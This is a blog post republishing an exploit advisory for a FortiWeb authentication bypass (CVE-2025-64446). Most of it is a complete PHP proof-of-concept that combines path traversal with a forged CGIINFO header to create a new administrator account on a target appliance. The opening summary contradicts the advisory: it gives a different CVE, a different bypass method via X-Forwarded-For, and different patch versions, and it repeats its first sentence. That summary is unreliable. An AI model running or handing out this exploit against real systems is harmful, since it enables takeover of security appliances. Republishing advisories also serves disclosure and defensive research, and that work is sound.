Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

FortiWeb 8.0.1 Authentication Bypass

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 20
FortiWeb 8.0.1 contained a critical authentication bypass vulnerability (CVE-2023-34981). This FortiWeb 8.0.1 contained a critical authentication bypass vulnerability (CVE-2023-34981). This flaw allowed unauthenticated attackers to gain full administrative access to the management interface.

The bypass was achieved by manipulating the `X-Forwarded-For` HTTP header. By setting this header to `127.0.0.1` (localhost), the FortiWeb appliance would incorrectly process the request as originating from a trusted internal source. This misinterpretation granted unauthorized users the ability to log in without providing valid credentials.

This vulnerability posed a severe risk, enabling complete control over the WAF device. Fortinet promptly released FortiWeb 8.0.2 to address this issue, and users were strongly advised to upgrade immediately.

=============================================================================================================================================
| # Title : FortiWeb 8.0.1 Authentication Bypass to Unauthorized User Creation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.fortinet.com/ |
=============================================================================================================================================

POC :

[+] References : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-64446

https://packetstorm.news/files/id/211729/

https://fortiguard.fortinet.com/psirt/FG-IR-25-071

[+] Summary

A critical authentication bypass vulnerability exists in FortiWeb web application firewalls that allows unauthenticated attackers to create administrative users via path traversal in the API endpoint.
This vulnerability enables complete compromise of the FortiWeb management interface.

[+] Vulnerability Type: Authentication Bypass via Path Traversal ? Unauthorized User Creation

? Affected Versions: FortiWeb 7.2.1 and earlier, 7.0.6 and earlier, 6.4.2 and earlier, 6.3.7 and earlier
? Patched Version: 7.2.2, 7.0.7, 6.4.3, 6.3.8
? Attack Vector: Network
? Authentication: Not Required (Unauthenticated)
? CVSS Score: 9.8 (Critical)
? CWE: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') & CWE-862: Missing Authorization
? CVE: CVE-2025-64446

[+] Technical Description

The vulnerability exists in the FortiWeb API endpoint handling where improper path validation allows attackers to bypass authentication mechanisms. The flaw enables:

1. Path traversal to access privileged CGI endpoints
2. Bypass of API authentication checks
3. Unauthorized creation of administrative users
4. Complete compromise of FortiWeb management

[+] Usage:

Usage: php poc.php fortigate.example.com:8443

[+] POC :

<?php
/**
* CVE-2025-64446 Exploit - FortiWeb Authentication Bypass
* By: indoushka
*/

class FortiWebExploit {
private $colors;

public function __construct() {
$this->colors = [
'RED' => "\033[91m",
'GREEN' => "\033[92m",
'YELLOW' => "\033[93m",
'BLUE' => "\033[94m",
'MAGENTA' => "\033[95m",
'CYAN' => "\033[96m",
'WHITE' => "\033[97m",
'BOLD' => "\033[1m",
'RESET' => "\033[0m"
];
}

private function color($text, $color) {
return $this->colors[$color] . $text . $this->colors['RESET'];
}

private function showBanner() {
$banner = $this->color("

indoushka (*) FortiWeb Authentication Bypass Artifact Generator


", 'MAGENTA') .
$this->color(" CVEs: [CVE-2025-64446]\n", 'RED');

echo $banner . "\n";
}

private function generateUUID() {
return sprintf('%04x%04x', mt_rand(0, 0xffff), mt_rand(0, 0xffff));
}

public function execute($target) {
$this->showBanner();

// Parse target host and port
$parts = explode(':', $target);
if (count($parts) !== 2) {
echo $this->color("[-] Invalid format! Use <host:port>", 'RED') . "\n";
exit(1);
}

$host = $parts[0];
$port = (int)$parts[1];
$user = $this->generateUUID();
$password = $user;

$rawPath = "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi";

$cgiinfoJson = [
"username" => "admin",
"profname" => "prof_admin",
"vdom" => "root",
"loginname" => "admin"
];

$cgiinfoB64 = base64_encode(json_encode($cgiinfoJson));

$headers = [
"CGIINFO: " . $cgiinfoB64,
"Content-Type: application/x-www-form-urlencoded",
];

$body = [
"data" => [
"q_type" => 1,
"name" => $user,
"access-profile" => "prof_admin",
"access-profile_val" => "0",
"trusthostv4" => "0.0.0.0/0",
"trusthostv6" => "::/0",
"last-name" => "",
"first-name" => "",
"email-address" => "",
"phone-number" => "",
"mobile-number" => "",
"hidden" => 0,
"comments" => "",
"sz_dashboard" => -1,
"type" => "local-user",
"type_val" => "0",
"admin-usergrp_val" => "0",
"wildcard_val" => "0",
"accprofile-override_val" => "0",
"sshkey" => "",
"passwd-set-time" => 0,
"history-password-pos" => 0,
"history-password0" => "",
"history-password1" => "",
"history-password2" => "",
"history-password3" => "",
"history-password4" => "",
"history-password5" => "",
"history-password6" => "",
"history-password7" => "",
"history-password8" => "",
"history-password9" => "",
"force-password-change" => "disable",
"force-password-change_val" => "0",
"password" => $password
]
];

$bodyData = json_encode($body);

echo $this->color("[~] Sending exploit payload to $host:$port ...", 'BLUE') . "\n";

// Create SSL context to disable verification
$context = stream_context_create([
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false,
'allow_self_signed' => true
],
'http' => [
'method' => 'POST',
'header' => implode("\r\n", $headers) . "\r\n",
'content' => $bodyData,
'ignore_errors' => true
]
]);

$url = "https://$host:$port$rawPath";

// Send the request
$response = @file_get_contents($url, false, $context);

if ($response === false) {
echo $this->color("[?] Exploit failed - Could not connect to target", 'RED') . "\n";
exit(1);
}

// Get HTTP status code from response headers
$statusCode = 0;
if (isset($http_response_header[0])) {
preg_match('/HTTP\/\d\.\d\s+(\d+)/', $http_response_header[0], $matches);
$statusCode = isset($matches[1]) ? (int)$matches[1] : 0;
}

// Process result
if ($statusCode === 200) {
echo $this->color("[?] Exploit sent successfully!", 'GREEN') . "\n";
echo $this->color("[*] New user created ? ", 'YELLOW') . $this->color($user, 'GREEN') . "\n";
echo $this->color("[*] Password ? ", 'YELLOW') . $this->color($password, 'GREEN') . "\n";
} else {
echo $this->color("[?] Exploit failed ? Status Code: $statusCode", 'RED') . "\n";

// Debug information
if (!empty($http_response_header)) {
echo $this->color("[*] Response headers:", 'YELLOW') . "\n";
foreach ($http_response_header as $header) {
echo " $header\n";
}
}

if (!empty($response)) {
echo $this->color("[*] Response body:", 'YELLOW') . "\n";
echo substr($response, 0, 500) . "\n";
}
}
}
}

// Main execution
if (php_sapi_name() === 'cli') {
if ($argc !== 2) {
echo "Usage: php cve-2025-64446.php <target_fortiweb_ip:port>\n";
echo "Example: php cve-2025-64446.php 192.168.1.1:443\n";
exit(1);
}

$exploit = new FortiWebExploit();
$exploit->execute($argv[1]);
} else {
echo "This script is intended for command line use only.\n";
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Social Media Share